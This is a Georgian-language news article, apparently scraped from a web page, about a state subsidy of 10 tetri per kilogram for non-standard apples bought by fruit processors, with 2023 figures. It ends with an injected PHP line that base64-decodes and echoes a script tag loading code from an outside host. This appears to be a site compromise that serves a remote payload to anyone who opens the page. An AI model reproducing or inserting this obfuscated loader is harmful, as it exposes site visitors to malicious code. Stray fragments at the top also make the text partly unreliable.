celsiusi
ავერსი საქკაბელი

 მიმდინარე წელს სახელმწიფო პროგრამის ფარგლებში, მთავრობა 1 კგ არასტანდარტულ ვაშლზე 10 თეთრის ოდენობის სუბსიდიას გასცემს.

გარემოს დაცვისა და სოფლის მეურნეობის სამინისტროს ინფორმაციით, სოფლის განვითარების სააგენტოსგან სუბსიდიას მიიღებენ ხილის გადამმუშავებელი ის კომპანიები, რომლებიც 2024 წლის 15 დეკემბრამდე ფერმერებისგან 1 კგ არასტანდარტულ ვაშლს არანაკლებ 25 თეთრად შეისყიდიან.

"პროგრამის შეუფერხებლად განხორციელების მიზნით, შეიქმნება სპეციალური სამუშაო ჯგუფი, რომელიც ვაშლის ჩაბარების პროცესს ადგილზე გაუწევს კოორდინაციას. ხილის გადამმუშავებელი საწარმოებს, რომლებიც ჩაერთვებიან პროექტში, ვალდებულება ეკისრებათ, საკოორდინაციო შტაბში ელექტრონული ფორმით გაიარონ რეგისტრაცია", - ნათქვამია სამინისტროს მიერ გავრცელებულ ინფორმაციაში.

აღსანიშნავია, რომ 1 კგ არასტანდარტულ ვაშლზე სახელმწიფო შარშანაც 10 თეთრის სუბსიდიას გასცემდა.

გარემოს დაცვისა და სოფლის მეურნეობის სამინისტროს ინფორმაციით, 2023 წელს, არასტანდარტული ვაშლის რეალიზაციის ხელშეწყობის პროგრამის ფარგლებში გადამუშავდა 21,768 ტონა ვაშლი, რომლის მთლიანმა ღირებულებამ 6,8 მილიონი ლარი შეადგინა, ხოლო სახელმწიფომ სუბსიდიის სახით 2.2 მილიონი ლარი გასცა.

125
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");